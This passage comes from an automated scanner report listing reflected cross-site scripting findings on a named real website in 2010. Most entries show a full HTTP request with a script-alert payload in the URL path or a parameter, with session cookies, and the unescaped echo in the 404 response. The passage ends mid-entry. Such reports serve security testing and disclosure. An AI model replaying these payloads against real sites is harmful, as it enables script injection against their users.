Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult74283<script>alert(1)</script>46d21d49eeb324acb/more2.html?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/more2.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:36:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult74283<script>alert(1)</script>46d21d49eeb324acb/more2.html?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.174. http://www.resellerbase.com/adult/more2.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/more2.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 63f4f<script>alert(1)</script>4cfb4821deb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult63f4f<script>alert(1)</script>4cfb4821deb/more2.html?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/more2.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult63f4f<script>alert(1)</script>4cfb4821deb/more2.html?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f was not found on this server.</p>
...[SNIP]...

2.175. http://www.resellerbase.com/adult/more2.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/more2.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34151<script>alert(1)</script>417a43aa28e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/34151<script>alert(1)</script>417a43aa28e?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/more2.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/34151<script>alert(1)</script>417a43aa28e?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f was not found on this server.</p>
...[SNIP]...

2.176. http://www.resellerbase.com/adult/more2.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/more2.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5da08<script>alert(1)</script>34a9075894bc7389b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/5da08<script>alert(1)</script>34a9075894bc7389b?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/more2.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:37:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/5da08<script>alert(1)</script>34a9075894bc7389b?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.177. http://www.resellerbase.com/adult/personals-dating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6087e<script>alert(1)</script>0d9de3ee9d98eb1dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult6087e<script>alert(1)</script>0d9de3ee9d98eb1dd/personals-dating/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult6087e<script>alert(1)</script>0d9de3ee9d98eb1dd/personals-dating/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.178. http://www.resellerbase.com/adult/personals-dating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 81182<script>alert(1)</script>7930a2f80f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult81182<script>alert(1)</script>7930a2f80f8/personals-dating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult81182<script>alert(1)</script>7930a2f80f8/personals-dating/ was not found on this server.</p>
...[SNIP]...

2.179. http://www.resellerbase.com/adult/personals-dating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 326c8<script>alert(1)</script>be7e44b4ceab92f56 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /adult/personals-dating326c8<script>alert(1)</script>be7e44b4ceab92f56/?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating326c8<script>alert(1)</script>be7e44b4ceab92f56/?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.180. http://www.resellerbase.com/adult/personals-dating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3172c<script>alert(1)</script>9eec34ac8e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating3172c<script>alert(1)</script>9eec34ac8e5/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating3172c<script>alert(1)</script>9eec34ac8e5/ was not found on this server.</p>
...[SNIP]...

2.181. http://www.resellerbase.com/adult/personals-dating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e7649<script>alert(1)</script>eb5444c9e7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/?e7649<script>alert(1)</script>eb5444c9e7e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/?e7649<script>alert(1)</script>eb5444c9e7e=1 was not found on this server.</p>
...[SNIP]...

2.182. http://www.resellerbase.com/adult/personals-dating/ [select parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/

Issue detail

The value of the select request parameter is copied into the HTML document as plain text between tags. The payload 1ea0f<a>fadb779f922 was submitted in the select parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f1ea0f<a>fadb779f922 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:31:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f1ea0f<a>fadb779f922 was not found on this server.</p>
...[SNIP]...

2.183. http://www.resellerbase.com/adult/personals-dating/googlepr.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/googlepr.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a49ef<script>alert(1)</script>ba394d72f1b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adulta49ef<script>alert(1)</script>ba394d72f1b/personals-dating/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adulta49ef<script>alert(1)</script>ba394d72f1b/personals-dating/googlepr.php was not found on this server.</p>
...[SNIP]...

2.184. http://www.resellerbase.com/adult/personals-dating/googlepr.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/googlepr.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 157de<script>alert(1)</script>9aa0d5e1c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating157de<script>alert(1)</script>9aa0d5e1c6/googlepr.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating157de<script>alert(1)</script>9aa0d5e1c6/googlepr.php was not found on this server.</p>
...[SNIP]...

2.185. http://www.resellerbase.com/adult/personals-dating/googlepr.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/googlepr.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a7fe6<script>alert(1)</script>3b9168099f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/googlepr.phpa7fe6<script>alert(1)</script>3b9168099f2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/googlepr.phpa7fe6<script>alert(1)</script>3b9168099f2 was not found on this server.</p>
...[SNIP]...

2.186. http://www.resellerbase.com/adult/personals-dating/googlepr.php [link_id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/googlepr.php

Issue detail

The value of the link_id request parameter is copied into the HTML document as plain text between tags. The payload fb75d<a>cd19e4de9ee was submitted in the link_id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/googlepr.php?link_id=19fb75d<a>cd19e4de9ee HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:41:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/googlepr.php?link_id=19fb75d<a>cd19e4de9ee was not found on this server.</p>
...[SNIP]...

2.187. http://www.resellerbase.com/adult/personals-dating/googlepr.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/googlepr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4aee3<script>alert(1)</script>a2b8e49cbd4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/googlepr.php?4aee3<script>alert(1)</script>a2b8e49cbd4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/googlepr.php?4aee3<script>alert(1)</script>a2b8e49cbd4=1 was not found on this server.</p>
...[SNIP]...

2.188. http://www.resellerbase.com/adult/personals-dating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 603f5<script>alert(1)</script>9231a5dc3b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult603f5<script>alert(1)</script>9231a5dc3b1/personals-dating/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult603f5<script>alert(1)</script>9231a5dc3b1/personals-dating/search.php was not found on this server.</p>
...[SNIP]...

2.189. http://www.resellerbase.com/adult/personals-dating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ef327<script>alert(1)</script>cbda9c6b9a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-datingef327<script>alert(1)</script>cbda9c6b9a2/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-datingef327<script>alert(1)</script>cbda9c6b9a2/search.php was not found on this server.</p>
...[SNIP]...

2.190. http://www.resellerbase.com/adult/personals-dating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dda2b<script>alert(1)</script>ee0504dcb69 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adult/personals-dating/search.phpdda2b<script>alert(1)</script>ee0504dcb69 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:34:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/search.phpdda2b<script>alert(1)</script>ee0504dcb69 was not found on this server.</p>
...[SNIP]...

2.191. http://www.resellerbase.com/adult/personals-dating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 7961e<a>bf4d8d44fa0 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /adult/personals-dating/search.php?keyword=search...&Submit3=Search7961e<a>bf4d8d44fa0&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/personals-dating/?select=http%253a%252f%252fwww.resellerbase.com%252fadult%252fmedia-chat%252f
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:33:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /adult/personals-dating/search.php?keyword=search...&Submit3=Search7961e<a>bf4d8d44fa0&opt=2 was not found on this server.</p>
...[SNIP]...

2.192. http://www.resellerbase.com/adult/personals-dating/search.php [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/adult/personals-dating/search.php

Issue detail

